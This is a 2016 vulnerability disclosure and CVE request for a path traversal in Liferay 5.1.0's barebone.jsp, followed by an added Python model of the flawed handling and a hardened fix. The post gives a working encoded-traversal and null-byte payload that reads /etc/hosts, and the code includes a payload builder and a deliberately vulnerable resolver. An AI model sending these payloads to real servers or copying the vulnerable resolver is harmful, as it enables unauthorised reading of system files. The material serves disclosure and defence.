Date: Mon, 1 Aug 2016 18:38:09 +0200
From: "petrella.pietro" <>
Subject: CVE:Request - Path Traversal Barebone.jsp - Liferay

I discovered a directory traversal issue in the minifierBundleDir
variable of barebone.jsp on a website running Liferay 5.1.0. I don't
exclude that this vulnerability is present in other Liferay versions as

However, I report the following vulnerable URL as an example:
minifierBundleDir=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E%2Fetc%2Fhosts%00.html&t=1429132297000

It's important to note that the requested URL is built in the following
- only encoded ".." characters are permitted when you insert the
traversal request
- at the end of the file it is necessary to insert %00 and .html, otherwise
the request is not accepted

So, to navigate the filesystem it is recommended to use the Burp Suite
"Repeater" tab.

If there is no CVE for this finding, for this purpose I request a CVE

Thank you

-- -- -- -- --
Pietro Petrella
Information Security Consultant
(CISSP, OPST, RHCE, ISO 27001:2013)
PGP: 5017 E6A8 9E1E 5B39 8C52 05C7 81A5 C3C9 8ED5 4730
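The three observations in the post (only encoded ".." gets through, the value must end in ".html", and a %00 has to sit before that suffix) fit a well-known pattern: a check on the raw parameter before decoding, an extension check on the decoded value, and a file API that stops reading at the first NUL byte, which older java.io.File implementations did. The block below is an added example, not Liferay's code and not from the post's author: it models that assumed flawed handling beside a hardened resolver, and reproduces the payload shape from the report so it can be pasted into Burp Repeater. WEB_ROOT, naive_resolve and safe_resolve are constructed for illustration; the real deployment path and the real barebone.jsp logic are not known from the post.

```python
"""Model of the parameter handling the post describes, as an added example.

Hypothetical code, not Liferay's: the constants and functions below are
assumptions made to illustrate why the observed payload shape works and what
a hardened resolver does differently. Run with: python3 traversal_model.py
"""
import posixpath
from urllib.parse import quote, unquote

# Constructed web root for the example; the real deployment path is unknown.
WEB_ROOT = "/opt/liferay/tomcat/webapps/ROOT/html/js"


def build_payload(target="/etc/hosts", depth=13):
    """Reproduce the value shape from the post: each '..' hop URL-encoded as
    %2E%2E, the target path encoded, then %00 and '.html' appended so a
    suffix check passes while a NUL-truncating file API drops the suffix."""
    hops = "/".join(["%2E%2E"] * depth)
    return "/" + hops + quote(target, safe="") + "%00.html"


def naive_resolve(web_root, param):
    """Assumed flawed handler matching the three behaviours reported:
    1. a literal '..' in the raw parameter is rejected (decoding happens
       afterwards, so %2E%2E slips through),
    2. the decoded value must end in '.html',
    3. the string is handed to a file API that stops at the first NUL byte
       (legacy java.io.File behaviour), so the '.html' never reaches disk.
    Returns the path that would be opened, or None if the request is refused."""
    if ".." in param:
        return None
    decoded = unquote(param)
    if not decoded.endswith(".html"):
        return None
    truncated = decoded.split("\x00", 1)[0]
    # normpath collapses the '..' hops; hops above '/' are simply discarded,
    # which is why over-supplying them (13 here) costs the attacker nothing.
    return posixpath.normpath(web_root + truncated)


def safe_resolve(web_root, param):
    """Hardened counterpart: decode first, reject NUL outright, then check the
    suffix and confine the canonical result to the web root. In a real
    deployment use os.path.realpath on the joined path so symlinks cannot
    escape the root either; posixpath is used here so the example runs
    without touching the filesystem."""
    decoded = unquote(param)
    if "\x00" in decoded or not decoded.endswith(".html"):
        return None
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    payload = build_payload()
    print("payload      :", payload)
    print("naive handler:", naive_resolve(WEB_ROOT, payload))
    print("safe handler :", safe_resolve(WEB_ROOT, payload))
    print("safe, benign :", safe_resolve(WEB_ROOT, "barebone.html"))
```

The order of operations is the whole point: the hardened version decodes before it inspects anything, treats a NUL byte as a hard error rather than something a later layer will "handle", and decides on the canonical path instead of on the string the client sent.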
